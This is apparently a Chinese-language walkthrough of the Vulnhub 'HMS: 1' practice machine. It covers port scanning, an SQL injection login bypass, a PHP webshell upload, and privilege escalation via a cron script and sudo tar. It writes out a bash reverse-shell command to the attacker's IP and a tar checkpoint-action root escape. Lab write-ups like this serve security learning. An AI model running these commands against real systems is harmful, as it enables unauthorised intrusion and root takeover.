Vulnhub 靶场 HMS?: 1
前期准备:
靶机地址:https://www.vulnhub.com/entry/hms-1,728/
kali攻击机ip:192.168.11.129
靶机ip:192.168.11.200
一、信息收集
1.使用nmap对目标靶机进行扫描
发现开放了21、22和7080端口。
2. 21端口
里面什么也没有。
3. 7080端口
看到一个表单,用弱密码检测了一番没什么结果,爆破了一会也没爆破出来。
二、漏洞利用
在 email 中测试一下是否有 sql 注入漏洞:
不过前端页面会做检测,删掉再做一下验证:
删掉 type 字段:
登录:
登陆成功了。查看网站内的信息:
在主页源码中发现了文件上传的路径。
并且还发现了一个 settings.php 页面,查看一下:
发现可以上传文件,那就从 pentenstmonkey 复制了一个 webshell 上传并监听,上传成功后访问之前发现的文件上传目录:
nc 连接成功。写入交互式shell:
可以升级一下 shell。
三、提权
查看下有什么用户:
发现有 eren 和 nivek 两个用户,查看一下可执行的文件:
发现可以执行 /bin/bash,那就可以切换用户:
成功切换到 eren 用户,查看权限也查看不了,不过在定时任务中有发现:
发现每隔五分钟运行一次,可以用它来提权,在 /home/eren/backup.sh 中写入 shell:
echo "bash -i >& /dev/tcp/192.168.11.129/1235 0>&1" >> backup.sh
nc 监听:
查看权限:
发现以可以用 tar 进行提权:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
提权成功,查看 flag: